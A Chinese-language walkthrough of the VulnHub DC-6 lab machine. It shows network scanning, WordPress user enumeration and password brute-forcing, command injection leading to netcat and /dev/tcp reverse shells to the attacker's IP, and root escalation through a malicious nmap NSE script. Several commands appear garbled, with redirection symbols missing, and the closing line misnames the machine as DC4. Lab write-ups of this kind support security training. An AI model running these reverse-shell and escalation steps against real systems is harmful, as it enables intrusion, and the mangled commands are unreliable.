
一.靶机下载官方链接https://download.vulnhub.com/dc/DC-6.zip网盘链接:https://pan.baidu.com/s/1kA-N2MptaIrB3OBWuxjPSg 提取码: x9d6导入之后要在设置中将其调为NAT模式默认情况我们是不知道靶机的密码的目的是通过kali获取靶机中的flag信息二.靶机信息收集因为靶机与kali处于同一网络状态下使用命令arp-scan -l得到靶机的ip为192.168.194.138使用命令nmap -A 192.168.194.138对靶机进行扫描发现靶机开放了80端口尝试对80端口进行访问发现访问失败url被解析成了 http:wordy,需要添加host记录使用命令echo 192.168.194.138 wordy /etc/hosts我们扫描一下他的目录使用命令dirb http://wordy扫描发现后台进行访问一眼发现这是WordPress我们采用专门针对wordpress的工具wpscan来进行用户枚举使用命令wpscan --url http://wordy/ -e u使用命令echo -e admin\mark\graham\sarah\jens users.txt三.爆破进行爆破一下,使用kali中的密码本因为这个密码本太长了去DC6的下载页面寻找线索使用命令grep -a 01$ /usr/share/wordlists/rockyou.txt /home/kali/Desktop/pass.txtrockyou.txt 就自行去下载使用命令:wpscan --url http://wordy/ -U /home/kali/Desktop/users.txt -P /home/kali/Desktop/passwords.txt使用账号密码成功登录逐个查看功能点发现一处可以注入的地方成功命令执行所以来接着来反弹shell使用命令nc -lvvp 1111127.0.0.1|nc -e /bin/bash 192.168.194.134 1111切换为交互式shell使用命令python -c import pty; pty.spawn(/bin/bash);切换到home目录寻找有用信息使用命令:cd /homelscd marklscd stufflscd things-to-do.txt发现泄露graham的密码GSo7isUM1D4直接切换graham用户使用命令su - graham查看graham的权限使用命令sudo -l可以 jens 身份无密码执行/home/jens/backups.sh接着追加反弹shell到backups.sh使用命令nc -lvvp 2222echo bash -i /dev/tcp/192.168.194.134/2222 01 /home/jens/backups.shsudo-u jens /home/jens/backups.sh使用命令sudo -l具有root权限可以运行nmap创建恶意 NSE 脚本使用命令echo os.execute(/bin/sh) /tmp/root.nsesudo 调用 nmap 加载脚本直接 root shell使用命令sudo nmap --script/tmp/root.nse成功获取 root 权限读取最终 flag使用命令cat /root/theflag.txt成功获取最后的flag如有错误请大佬们指正到这里我们也是成功通关了DC4靶机后续会接着更新DC系列的靶机通关教程请多多关注一下